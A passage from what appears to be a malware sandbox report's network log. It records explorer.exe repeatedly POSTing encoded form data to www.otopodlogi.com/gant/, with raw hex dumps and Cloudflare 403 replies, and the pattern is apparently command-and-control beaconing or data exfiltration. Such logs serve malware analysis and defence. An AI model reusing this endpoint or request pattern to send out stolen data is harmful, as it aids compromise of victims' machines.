                                                                                                                  Feb 13, 2023 19:05:25.216784000 CET1454INData Raw: 0e d7 f1 32 43 e5 fa 8c f3 ab 15 2a f7 56 58 87 0a 4d bb bd 16 8a eb 75 ff d7 9f de fe e8 5c fe 33 fe b1 44 eb da ed 7f df be 7f 57 fe ef 5b 67 84 5a 88 64 d3 fd bc 62 06 70 b6 95 cd ca 9e 78 b6 95 bf 40 77 25 d1 7f fe 73 73 cd 3b 04 8d d1 86 26
                                                                                                                  Data Ascii: 2C*VXMu\3DW[gZdbpx@w%ss;&<bK7,ct{LvgMHb)qs!RsA/E'K9a+Q_:#;3co\aPlOoUjbGXK3n^pCz$>?&
                                                                                                                  Feb 13, 2023 19:05:25.216836929 CET1455INData Raw: 5e 2a 4f 6f 0b dd 8f 91 51 70 9b 1c 67 a4 ec 21 f3 8f 68 c3 a0 6c cc ff 3e c5 94 de d7 eb 9d de 55 6b 9f 69 ed 47 b8 7a 8a c1 3e 27 3e 1e c3 f2 d9 f6 6c f0 5d ca d4 43 71 e2 3c 66 37 7a 69 b6 82 5e 35 b7 af d3 d4 11 ac 6d 69 5f 09 09 78 e6 ab 07
                                                                                                                  Data Ascii: ^*OoQpg!hl>UkiGz>'>l]Cq<f7zi^5mi_x-xgIlM?T3wFwI33gI^l9yo@<|3i|A='qsfU\]TUI*}o&CsjpLS"~(s
                                                                                                                  Feb 13, 2023 19:05:25.216878891 CET1455INData Raw: 61 0d 0a 03 00 a5 37 72 98 c0 17 00 00 0d 0a
                                                                                                                  Data Ascii: a7r
                                                                                                                  Feb 13, 2023 19:05:25.216917038 CET1455INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  61192.168.11.2049918188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:27.431292057 CET1456OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.otopodlogi.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.otopodlogi.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 76 38 35 4a 6b 4f 6e 76 41 5a 34 73 52 34 74 6b 4f 66 78 57 79 4d 6e 33 64 30 34 4f 43 39 30 7e 34 66 72 39 48 79 77 50 68 4a 46 44 2d 38 4b 64 4b 58 68 67 6d 79 37 55 4f 32 47 36 4f 57 35 7e 6c 68 6e 78 47 39 5f 6f 76 55 69 33 6e 54 44 62 50 4b 78 30 73 54 4c 64 6a 35 64 4a 43 52 6b 49 4a 65 4f 32 79 63 53 51 46 34 63 42 50 46 77 38 78 51 39 65 79 42 67 53 43 71 57 78 78 4c 4b 4e 70 75 34 67 79 46 77 6d 53 63 57 39 59 77 44 38 54 48 53 41 68 54 73 62 4f 34 47 62 42 34 77 41 30 37 4c 4f 52 54 6d 4f 30 72 50 63 33 4b 69 63 38 7a 30 46 69 45 67 37 6d 39 5a 4d 43 61 54 77 51 4a 54 65 67 4d 47 59 64 37 73 6f 72 63 4d 41 52 57 67 68 39 74 46 34 33 45 48 72 52 51 74 72 61 5a 66 59 6c 5a 74 63 32 79 42 78 5f 62 6e 77 46 4f 4b 5a 70 36 57 77 6e 6c 4b 42 32 52 6a 78 72 31 52 35 67 50 75 75 6a 6a 62 33 47 71 64 65 4a 4b 48 36 49 53 73 4f 41 66 78 28 51 39 36 65 76 63 4f 4e 38 39 54 72 6d 4a 37 68 56 46 65 28 30 7e 5f 28 64 55 50 72 68 4d 56 54 65 76 44 4b 77 59 55 74 78 75 78 41 66 66 49 77 79 55 33 56 5a 6d 48 74 45 6b 46 42 36 33 64 6b 79 7a 6d 52 45 4f 73 35 4e 79 6e 7e 39 45 46 38 75 58 6c 6b 48 72 5a 4f 74 61 71 58 43 30 63 75 30 6b 6f 71 4e 30 36 71 6a 58 55 38 39 76 64 72 72 4e 63 33 71 7a 31 7a 6e 53 66 4f 68 4f 2d 69 48 77 75 30 38 34 68 52 6f 74 4c 77 4c 65 37 63 74 53 44 48 65 49 75 69 79 69 41 4d 33 51 46 42 53 4d 75 36 68 33 4a 67 57 74 35 63 56 59 54 37 6f 70 6b 46 54 41 63 59 7a 30 4a 4a 38 38 42 52 75 4d 45 4c 75 53 73 32 4d 38 65 6a 61 43 62 6e 76 4b 58 6e 45 7e 6d 42 6c 6d 33 71 33 43 50 43 76 33 64 44 45 37 4f 48 5a 67 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7v85JkOnvAZ4sR4tkOfxWyMn3d04OC90~4fr9HywPhJFD-8KdKXhgmy7UO2G6OW5~lhnxG9_ovUi3nTDbPKx0sTLdj5dJCRkIJeO2ycSQF4cBPFw8xQ9eyBgSCqWxxLKNpu4gyFwmScW9YwD8THSAhTsbO4GbB4wA07LORTmO0rPc3Kic8z0FiEg7m9ZMCaTwQJTegMGYd7sorcMARWgh9tF43EHrRQtraZfYlZtc2yBx_bnwFOKZp6WwnlKB2Rjxr1R5gPuujjb3GqdeJKH6ISsOAfx(Q96evcON89TrmJ7hVFe(0~_(dUPrhMVTevDKwYUtxuxAffIwyU3VZmHtEkFB63dkyzmREOs5Nyn~9EF8uXlkHrZOtaqXC0cu0koqN06qjXU89vdrrNc3qz1znSfOhO-iHwu084hRotLwLe7ctSDHeIuiyiAM3QFBSMu6h3JgWt5cVYT7opkFTAcYz0JJ88BRuMELuSs2M8ejaCbnvKXnE~mBlm3q3CPCv3dDE7OHZg.
                                                                                                                  Feb 13, 2023 19:05:27.651361942 CET1457INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yXfEG0IGdH%2BaQqCVBUFtK8tOMm4s7jle8dCW%2BqwTOaiAlAu4ocbrcNHrYnCQJ21Vbh8M3Pbfn8I2o2i%2BUpMmGUm4dg4RO%2FKZaLO5upMDm1ZASukwvuuctZT0rY8lst%2FvOJmOqxU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f7e067de535f4-FRA
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 38 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 5c 09 10 35 1a f9 19 69 34 45 d7 f1 a2 de 4d 13 a3 76 d0 06 45 61 70 86 77 24 c6 1c 72 4a 52 92 85 d4 ff 7d c1 79 c8 a3 47 dc 04 8b 45 fd c1 1a be 2e ef e3 f0 f2 f0 46 af de bc bf bc fb 78 73 05 73 97 cb b8 13 bd a2 f4 37 91 81 74 70 7d 05 e7 bf c7 10 f9 01 48 25 b3 76 4a 94 a6 9f 2c 08 3c 03 2d b9 40 02 92 a9 d9 94 a0 a2 1f 6e 49 0c d1 ab df 50 71 91 fd 4e e9 b3 a8 5a 0e c0 61 51 e7 df 26 ea e2 05 51 17 df 20 6a e6 6a 69 be e3 90 95 fb 52 28 dd 96 34 47 c6 e3 4e e4 84 93 18 bf 79 77 0b 85 16 ca 59 70 1a 0a a3 e7 22 11 0e 39 5c df c0 9f b0 5a ad 06 da e9 42 73 a9 67 62 90 ea 1c fe 84 4b a9 17 3c 93 cc 60 14 54 42 3a 51 8e 8e 41 3a 67 c6 a2 9b 92 0f 77 ff a2 17 04 82 66 60 ee 5c 41 f1 8f 85 58 4e c9 a5 56 0e 95 a3 77 eb 02 09 a4 55 6b 4a 1c 3e ba c0 1b 33 d9 88 79 49 ca af f4 c3 0f f4 52 e7 05 73 22 91 6d 41 d7 57 d3 2b 3e c3 d6 3a c5 72 9c 12 a3 13 ed 6c 6b a2 d2 42 71 7c ec 83 d2 99 96 52 af f6 96 2c 05 ae 0a 6d 5c 6b d1 4a 70 37 9f 72 5c 8a 14 69 d9 e8 0b 25 9c 60 92 da 94 49 9c 86 95 14 29 d4 03 18 94 53 62 dd 5a a2 9d 23 3a 02 82 4f 49 9a dd 57 5d 34 b5 96 c0 dc 60 36 25 41 ca 15 4d 67 22 a8 86 82 9c 09 35 28 c7 83 b8 d3 e9 44 36 35 a2 70 71 a7 9b 2d 54 ea 84 56 dd de 67 91 75
                                                                                                                  Data Ascii: 88eXko7_q\5i4EMvEapw$rJR}yGE.Fxss7tp}H%vJ,<-@nIPqNZaQ&Q jjiR(4GNywYp"9\ZBsgbK<`TB:QA:gwf`\AXNVwUkJ>3yIRs"mAW+>:rlkBq|R,m\kJp7r\i%`I)SbZ#:OIW]4`6%AMg"5(D65pq-TVgu
                                                                                                                  Feb 13, 2023 19:05:27.651473999 CET1459INData Raw: b9 4e 17 39 2a 37 60 9c 5f 2d 51 b9 b7 c2 3a 54 68 8e 8e 56 42 71 bd 1a fc fa d3 db 1f 9d 2b 7e c6 3f 16 68 dd d1 d1 bf 6f df bf ab fe 0f ac 33 42 cd 44 b6 ee 7d 5e 32 03 38 dd c8 66 55 4f 3a dd c8 9f a1 bb 92 e8 3f ff b9 be e6 5d 82 c6 68 43 33
                                                                                                                  Data Ascii: N9*7`_-Q:ThVBq+~?ho3BD}^28fUO:?]hC3DY)ZKzdpN3zYr/.8vz9p,ZI2.y{G<{2Io,Zq4m+)R}|Z}am"Ia6
                                                                                                                  Feb 13, 2023 19:05:27.651540041 CET1459INData Raw: 3c bd 2d 75 3f 44 46 c1 ad 0b 9c 92 aa 87 c4 1f d1 46 41 d5 88 ff 3e c5 94 de d5 eb 9d de 56 6b 97 69 ed 46 b8 7e 8a c1 2e 27 3e 1c c3 ea d9 f6 6c f0 dd 9c a9 87 f2 c4 79 cc ae f5 c2 6c 04 bd 6a 6f df a4 a9 03 58 db d0 be 0a 12 f0 cc 57 f7 f8 5b
                                                                                                                  Data Ascii: <-u?DFFA>VkiF~.'>lyljoXW[,bMO_kO?V6%fnUc|lxXQoq6uIZg*~s}o@<|shIU|A3:>V|>auGqglrw\"lhwH;w
                                                                                                                  Feb 13, 2023 19:05:27.651595116 CET1459INData Raw: 61 0d 0a 03 00 59 9b 35 f7 c1 17 00 00 0d 0a
                                                                                                                  Data Ascii: aY5
                                                                                                                  Feb 13, 2023 19:05:27.651638985 CET1459INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  62192.168.11.2049919188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:29.963790894 CET1469OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.otopodlogi.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.otopodlogi.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 76 38 35 4a 6b 4f 6e 76 41 5a 34 73 52 34 74 6b 4f 66 78 57 79 4d 6e 33 64 30 34 4f 43 39 30 7e 34 66 72 39 48 79 77 50 68 52 46 44 4d 6b 4b 50 37 58 68 79 32 79 37 4c 2d 32 48 36 4f 57 42 7e 6c 70 72 78 47 77 49 6f 70 59 69 32 30 62 44 61 36 65 78 6b 63 53 73 45 54 34 62 4e 43 51 34 49 4a 54 48 32 32 4e 76 51 52 77 63 43 4d 64 77 33 6d 73 36 53 43 41 4b 53 43 71 67 31 78 4b 33 4e 70 71 6f 67 79 4a 77 6d 55 55 57 38 71 59 44 35 45 54 53 4e 52 54 7a 56 75 34 44 52 68 35 41 41 30 76 31 4f 52 53 64 4f 78 4c 50 63 30 75 69 66 39 7a 33 47 43 45 67 36 6d 39 59 49 43 47 58 77 52 6b 4f 65 68 34 47 59 61 76 73 71 4c 63 4d 4b 54 7e 76 6f 39 74 44 72 6e 45 75 76 52 63 31 72 65 35 74 59 6b 74 74 66 47 32 42 77 4d 6a 6e 7a 68 61 4b 62 4a 36 59 74 58 6c 43 4b 57 52 46 78 72 46 4e 35 68 75 62 75 68 50 62 32 6e 4b 64 56 49 4b 45 39 6f 53 71 42 67 66 6f 37 51 67 31 65 76 4e 52 4e 38 38 49 72 6a 74 37 68 68 42 65 34 41 4b 2d 39 4e 55 45 28 52 4d 45 5a 2d 69 4d 4b 77 45 6d 74 77 58 75 41 66 72 49 28 79 55 33 54 36 65 49 34 45 6b 43 63 71 32 51 6e 43 7a 31 52 45 79 4b 35 4a 72 53 7e 4e 67 46 74 4b 7a 6c 75 33 72 61 45 74 61 55 59 69 30 57 71 30 6b 6f 71 4e 6f 51 71 6a 62 55 38 4a 72 64 71 59 6c 63 6d 70 62 31 31 6e 53 5a 4f 68 50 36 69 48 39 4f 30 39 42 43 52 70 64 68 77 49 79 37 63 38 43 44 45 62 38 74 77 79 69 42 49 33 51 53 4c 79 42 78 36 68 37 52 67 57 39 32 64 6e 73 54 36 6f 5a 6b 4f 7a 41 66 53 7a 31 44 41 63 38 58 56 75 51 51 4c 76 7e 57 32 4e 35 47 6a 61 71 62 71 72 6e 72 6a 55 4b 6c 44 57 75 4a 6d 77 7e 39 46 2d 61 64 41 6d 71 46 55 70 41 59 4d 46 4b 4b 53 56 64 5f 42 49 79 4b 6a 4d 4c 6a 50 48 56 2d 79 33 64 63 32 72 76 38 35 4f 38 71 6f 44 4f 48 67 69 42 69 65 70 55 52 61 32 38 73 77 78 4f 6d 50 5a 64 69 44 4c 6f 75 71 5a 4d 47 37 67 59 4a 4d 54 62 69 49 67 53 6c 55 37 46 45 36 43 72 59 74 45 4a 53 28 4c 79 54 73 4b 65 61 6f 4f 6d 65 54 79 6a 69 52 51 4f 66 74 30 38 61 47 6d 53 67 39 35 33 4e 44 50 35 30 6c 39 49 48 70 78 7a 66 31 36 4e 65 42 36 73 55 4f 43 64 52 77 68 51 46 79 62 76 70 31 62 77 5f 4d 47 63 44 47 65 38 75 4d 72 66 30 47 2d 66 53 38 69 64 31 50 57 52 76 73 37 34 78 73 6b 67 37 30 50 35 74 64 32 65 43 42 46 39 47 79 61 73 79 44 44 54 33 64 32 62 73 72 51 67 4e 6c 51 4f 70 63 77 55 42 32 30 64 44 37 72 6d 73 45 73 53 37 4e 74 6b 53 69 36 75 63 75 4f 64 31 36 70 63 38 56 6c 67 68 79 74 7a 5f 4d 65 6d 6a 32 30 7e 72 71 4b 65 45 6d 6d 67 53 37 62 28 38 50 52 4a 75 6e 72 52 45 54 4a 76 73 42 2d 31 50 6d 4f 34 77 4a 33 68 5f 72 59 42 31 48 6b 42 65 77 46 75 41 38 44 63 36 74 6a 77 4e 6f 76 53 79 38 7a 53 47 42 53 63 4b 61 32 37 52 6e 77 46 6d 53 32 4e 30 4c 71 47 72 39 32 64 52 62 70 62 57 63 30 6d 34 68 5f 79 4c 4d 6a 6d 46 39 54 74 58 66 49 52 49 44 44 79 66 72 42 7e 50 78 6d 6b 74 55 30 47 36 58 48 68 5a 72 66 6a 2d 78 35 49 76 6b 4e 6d 6f 64 6b 6c 59 31 51 72 36 45 2d 4e 72 32 30 5a 71 34 6b 62 2d 70 4f 68 4a 38 64 31 4e 32 31 32 45 33 75 4f 30 73 57 46 38 66 50 63 44 70 4d 4e 6e 57 46 64 67 7e 4c 66 44 63 57 59 45 76 38 4a 48 50 38 4f 57 68 4b 57 61 51 77 44 62 78 33 67 5f 28 35 66 33 61 54 45 65 37 64 69 4e 70 46 4d 47 7a 58 65 77 75 4c 44 4e 55 78 77 7a 28 4b 42 4e 5a 41 53 70 50 70 7a 34 6c 5a 62 65 57 7a 5a 30 59 4a 65 66 58 39 72 63 46 72 4d 5f 68 79 5a 31 49 6b 41 68 47 6d 75 35 67 79 57 42 57 6c 62 6f 31 43 4f 79 33 49 56 58 52 41 52 58 37 48 33 59 6b 74 72 65 48 68 54 49 30 70 6e 6f 35 66 77 56 28 51 33 34 49 64 55 70 4a 37 34 4b 32 79 43 30 56 54 75 67 4c 37 4f 6e 65 39 69 4c 55 42 47 4b 6d 69 39 67 69 74 32 59 36 4e 4a 67 6c 4b 58 54 65 53 4d 31 6e 46 31 75 77 56 57 73 4d 49 39 5f 30 48 57 55 45 4e 4b 4c 35 39 48 5f 59 6f 5a 41 74 4d 59 6a 67 7a 51 2d 33 33 63 52 56 38 69 73 32 5a 74 63 75 37 54 59 67 4d 7e 53 78 66 67 36 52 78 53 45 61 73 67 6f 67 36 42 4f 38 2d 34 70 33 71 75 69 72 54 71 36 70 75 54 50 72 71 46 6a 4d 50 58 48 45 61 49 4e 7e 5f 55 33 36 4b 32 4b 6b 49 72 69 51 35 34 76 4a 76 67 66 6d 43 72 50 75 4c 65 44 33 54 7e 61 58 67 53 33 4b 74 4e 32 75 31 56 42 59 43 79 50 71 57 44 36 44 45 5a 52 74 65 30 62 59 6a 36 48 59 6b 58 78 43 32 76 74 67 6c 49 51 76 79 44 34
                                                                                                                  Data Ascii: j-Jh9P=7v85JkOnvAZ4sR4tkOfxWyMn3d04OC90~4fr9HywPhRFDMkKP7Xhy2y7L-2H6OWB~lprxGwIopYi20bDa6exkcSsET4bNCQ4IJTH22NvQRwcCMdw3ms6SCAKSCqg1xK3NpqogyJwmUUW8qYD5ETSNRTzVu4DRh5AA0v1ORSdOxLPc0uif9z3GCEg6m9YICGXwRkOeh4GYavsqLcMKT~vo9tDrnEuvRc1re5tYkttfG2BwMjnzhaKbJ6YtXlCKWRFxrFN5hubuhPb2nKdVIKE9oSqBgfo7Qg1evNRN88Irjt7hhBe4AK-9NUE(RMEZ-iMKwEmtwXuAfrI(yU3T6eI4EkCcq2QnCz1REyK5JrS~NgFtKzlu3raEtaUYi0Wq0koqNoQqjbU8JrdqYlcmpb11nSZOhP6iH9O09BCRpdhwIy7c8CDEb8twyiBI3QSLyBx6h7RgW92dnsT6oZkOzAfSz1DAc8XVuQQLv~W2N5GjaqbqrnrjUKlDWuJmw~9F-adAmqFUpAYMFKKSVd_BIyKjMLjPHV-y3dc2rv85O8qoDOHgiBiepURa28swxOmPZdiDLouqZMG7gYJMTbiIgSlU7FE6CrYtEJS(LyTsKeaoOmeTyjiRQOft08aGmSg953NDP50l9IHpxzf16NeB6sUOCdRwhQFybvp1bw_MGcDGe8uMrf0G-fS8id1PWRvs74xskg70P5td2eCBF9GyasyDDT3d2bsrQgNlQOpcwUB20dD7rmsEsS7NtkSi6ucuOd16pc8Vlghytz_Memj20~rqKeEmmgS7b(8PRJunrRETJvsB-1PmO4wJ3h_rYB1HkBewFuA8Dc6tjwNovSy8zSGBScKa27RnwFmS2N0LqGr92dRbpbWc0m4h_yLMjmF9TtXfIRIDDyfrB~PxmktU0G6XHhZrfj-x5IvkNmodklY1Qr6E-Nr20Zq4kb-pOhJ8d1N212E3uO0sWF8fPcDpMNnWFdg~LfDcWYEv8JHP8OWhKWaQwDbx3g_(5f3aTEe7diNpFMGzXewuLDNUxwz(KBNZASpPpz4lZbeWzZ0YJefX9rcFrM_hyZ1IkAhGmu5gyWBWlbo1COy3IVXRARX7H3YktreHhTI0pno5fwV(Q34IdUpJ74K2yC0VTugL7One9iLUBGKmi9git2Y6NJglKXTeSM1nF1uwVWsMI9_0HWUENKL59H_YoZAtMYjgzQ-33cRV8is2Ztcu7TYgM~Sxfg6RxSEasgog6BO8-4p3quirTq6puTPrqFjMPXHEaIN~_U36K2KkIriQ54vJvgfmCrPuLeD3T~aXgS3KtN2u1VBYCyPqWD6DEZRte0bYj6HYkXxC2vtglIQvyD47tR_3TCcoYxwuvkYzgQskTMph_i-cVFnTWJdkyA9BmqEWCBDkHoTPefUW0rtuBtWl73yBqUYBpQfj7syK14VeCR5z71v4xTk7ssTvv3VF-VB1uSCizGkdaOFEljwHjZNg1eOw666XFAezZIl9udZTkNeZnqhJtKcOhB9Rx53IeOcI-dYQRchNVFve4(w7A607qJpgz9f0_qmwqaoUEB-XfRJ9v(nHIQNjetGcPTzs1PEhSmaaJjBrW396C1eEMwiNgeTzbkx(GBjgcaUAnRE2xHkHPsdHB~4oe7dbjN947y48uIn1gmH6RhFt9xVuS6_kbF7WZdAXEcZk9t5uTHzITWMDPysX0OCeEp4GLK2kzMeFu6p7hygFmreToRnjUKH234YgA9PAr1UnZAWBo2EKizlm_DzzmjLQlVPgWlrdDlGcNh4BizzvcOhvAGPUBtOIN58VhOHKXK-v9vt(yk9G2rHz4aFfm5q~1jWdaq21AiEgEQpWXo8Fbkw1P0n~3bbsfKLrOBNyqll6yHwXiKkDCtzATb9BPJYKl~Kyjeq55IOgniov9okt4dY2bFDflJ2tpRL7UtK7FJFRcskVkcl5VpGDIjO1ATSlhkaeY44Gti4ZMv0A0HZWNFt6PemPuMYL97JejydUQz4dSORVmHZ(-m8vQHFJ139(KPH9nOe3K~tcUIRQXmr0TzAXwfIoAQ72B8fG_fZtXWD4ohSWsCH38b123ilb0L7G2xtf8CKLvidjuEAACihHIopPLP9H8gN5p2SwyOApWfhwUwuMRnQkMeNuIIWZ15SWJXERtz5dLVUUrH8tbGM8ivs9vYtQ_3hf4V_Ov~UAmx5G5bsJdjdYhykUL8pi79hiAybAuWXdlcMXz(Op1j6zElPegKK1eSns-49KOKOfs0v~vz-Yj0aJdu9Hh(UNisOmcnUT_98W7vmlkOo7x7mUMjJI7EbYCNErIVY1kFVnBdZxMl5W418eYhotkOyj52ZNbsK85q5wOJdWLLWXlg_k9H6Z5Nf506Rc2Alsb~xH1C5Zmt71eqNTkSeTaFekR3Ey7FebI8Yy3Tt3Y1kNUjyn7r5NmTsfoYzKBtIWBWEDFS6lfjXomvKtjK9s0wtg2c2und4B-uEcbHE9WbTStLmEAKVevnfWr3tZM(AfH9pKkjSNPeEt2AqqV9PeYGc(lw4wnhCaAI2mpJqNNNoc2WmiJRhi5lRqHD3cu0yEpkNq5Woq9JqK_DiyQ7dw7NgsP(7eOOpzSoQU-7XaplVcRHMsMjYTRnpeUZg3MXgvV6gV0HyHZE8Qjf1IVGx7IE3WLpfkfPD03iM082NYUhB81h7nwenHAtkkhIVmeBhQc5pq3GiZvqCXW~Wwx61xeEURx9WZ82CoXi4Lx7e6DDlvQPX~tu8NvBHFYxV1JWD1XsVlxBHTQKUwf4fC8xfie6zfuNBMD9go6bFo-hV4zlWmKULWQpFQRLbiMDIMFZ9nzrrIwD12p~Rr94GyN3aX6r7k_35YZsklqAR0Rik6YpMbmvrlJUlNeHL3v4fCfLCMlYLlsCOufOongL-uqaPqmooLli7fHv3Ml~QyBkMYAXcFp(VmrrUg1Ml8tXJi9B0~i0By-lgQfemIdcnX6cwH9gEFmM8AaxsT4EsuvbfcxUtu-4_31ENdGaj4UjQcDI3NxuKQW6-scTLzuoJfT8S6I3BUELNNO9lK3wjpTyiqACHDeJDZRpc5SkmFVCcfcEzciI4(gIQRylt~cxuxlxjmZhxtx7sMkz8hGwj2ubafQE8d6vIJm1-NY0JbDNZRGLPKV2q6XAZVj0yfsJzS5cB1WJoYjXN0WtvUpXgfMBFaYNdOu8FKnYbnES72Y2ia74ZE5iee8mnANwLVXe6dLvI9Yqah140eZwYs-TdWzfW5c9HVPQSERTVP83Sj9yq2BrE~sM2kKupcVY70PdwT3D-mFR18qOFN_QcnMNn5dBCsF0bMalbHUT4whaBTbn9L71rKy9rYnoBDOl_C90pTGAFP2RrhKnwYvEUlJdqsiOJnYjSer(9Is8mF2HDadzZjaIUJ7Uhk4v_7BzkfegaFQf41GWQ~Rod3j8ezFgyBYa0xyTl6c7sGMyLDR(NmGC8ZM3ElSeK8eW1N3oOC1QON9hIi4zvJ3haggcKCvACfGgTHgvjIUCLX8(sY9O4BurtDRvBUqLWBxT2demQCdYukdOEZ7EmobXxOvKa~rykP8lrAAvUDgpS(xEn6j3qdJaydXbXksOXI9EVnTvFhtg1V11RA5wyfWIO(1I3cIX4Do8lN5amqcmyBWM9Vq9IoLa6nbvH3wxM5SurvAqJM6B3NUvYn75cbIszrG90dFpwKLVnbRFPGDDbTvaVffIKMGRBX7IpoWJkBplUBeQs6wf7mKsFptOA8WSSuWbFyY(ToVhsLmtoZt0VWjQxwJ2SvtQEjtxvCJj08mixP8iq29KXC20tUPy49IEn7KQEtXPhf-LC~MtenoRY1wjm9FhMbrpGyswfXkxXE_9-pQ0QeByNmHJDYH4ZCSVjYMV9cGECFzqc6144g2x3urMn7JjdnJg_8YjvE8~NCnKfcSsDVkNKZRxlwdNTztvW5GjdGDbnKSm4CscqFOOJlTFAkt(SGSYChlyCcqHxr59qVhUu3KJfyfsKgD2zfHUQmkJfbJfsNrJ8xqyrVDKtYfjj~Inaq7O1Duijh3titViiB5HTFZMKmhfEQE1nJekvCZx
                                                                                                                  Feb 13, 2023 19:05:29.963912964 CET1472OUTData Raw: 58 78 4f 66 4f 77 55 4a 75 4f 6f 56 69 46 39 34 2d 53 67 44 6c 67 55 6e 56 66 70 43 56 76 79 79 6e 42 77 78 44 66 44 58 62 35 38 58 55 49 47 6c 36 39 38 51 6e 64 66 66 48 56 69 68 43 63 5a 58 6a 54 74 6d 72 51 67 6e 63 6c 59 34 68 44 71 62 42 74
                                                                                                                  Data Ascii: XxOfOwUJuOoViF94-SgDlgUnVfpCVvyynBwxDfDXb58XUIGl698QndffHVihCcZXjTtmrQgnclY4hDqbBtutyn9~Le8nKX15k8vurGdOpUz9J~pRb1WM9ft64Pk56Ull3Xis2fp3-x-VDa4hptjSZ~SUn(D0imCLW91GEi5I2iHtXfHk2h20LNzpnefgyUZwzbtmMYcvNYmZzlWXTBgKdE3vMWkYC6VDgN6xmuj7dICdQLdQbhy
                                                                                                                  Feb 13, 2023 19:05:29.973376989 CET1479OUTData Raw: 4a 79 71 35 68 57 4f 73 32 4e 5a 75 53 4e 6a 4a 76 48 55 62 6f 72 68 32 58 37 73 33 59 62 57 5a 45 50 57 77 31 47 7a 31 78 66 4b 58 5f 28 78 77 55 51 79 43 54 46 7a 53 78 47 66 71 69 30 54 74 78 36 66 48 61 43 75 58 78 30 61 65 50 4e 4c 66 55 59
                                                                                                                  Data Ascii: Jyq5hWOs2NZuSNjJvHUborh2X7s3YbWZEPWw1Gz1xfKX_(xwUQyCTFzSxGfqi0Ttx6fHaCuXx0aePNLfUY9gH38K02k5cTdbh6HG9TW7xhsmUi3hEXdG-hv(Nsz368VYj6RL2qlCkqcgQnEnSfocJUCi6b9Z23xrIhtcBFA(RyF30mNf7HSwpRZiL6E4IEIk3lFjmrdWqHBoccCpiZ4WBQGeW8mpCVQ28CbX-ftpjBqpq4hnViC
                                                                                                                  Feb 13, 2023 19:05:29.973507881 CET1483OUTData Raw: 4f 5a 4f 69 65 4a 69 6c 6e 6f 72 71 34 67 7a 48 6f 67 4c 62 77 6a 57 28 57 4f 68 44 39 6e 34 35 52 6d 39 36 2d 48 39 7a 66 28 4f 79 33 56 70 6b 33 31 73 62 44 70 73 61 59 63 6a 4d 6e 4e 53 4e 44 74 59 68 33 79 49 71 48 71 79 75 47 49 30 6d 49 78
                                                                                                                  Data Ascii: OZOieJilnorq4gzHogLbwjW(WOhD9n45Rm96-H9zf(Oy3Vpk31sbDpsaYcjMnNSNDtYh3yIqHqyuGI0mIxDlCqpKTS4JJlAfms_9-AMKnXBOFMsPWskSxpXkpUUDV(3WY9qXXXT2LuahIjqgGt8PWBvSVNgNmT6oqyxR1g3y1R1NaqbX8hZG07gfS05WNFAXDXSiEO7et3qNCQiKkeZVblZwfu3f8tp0pPQmYPnHlro5DtI6OCu
                                                                                                                  Feb 13, 2023 19:05:29.973881960 CET1488OUTData Raw: 63 48 78 6c 58 50 7a 64 65 30 6f 58 67 49 77 4f 39 4d 42 51 4a 72 6b 6d 32 45 6a 49 43 7e 4e 30 6f 52 58 51 4a 37 48 38 5f 4f 6d 56 4e 6f 46 64 55 72 7a 64 4d 66 4f 6e 68 77 63 71 35 64 36 6a 41 49 59 72 54 45 78 4d 32 37 4f 75 35 6a 4f 52 66 74
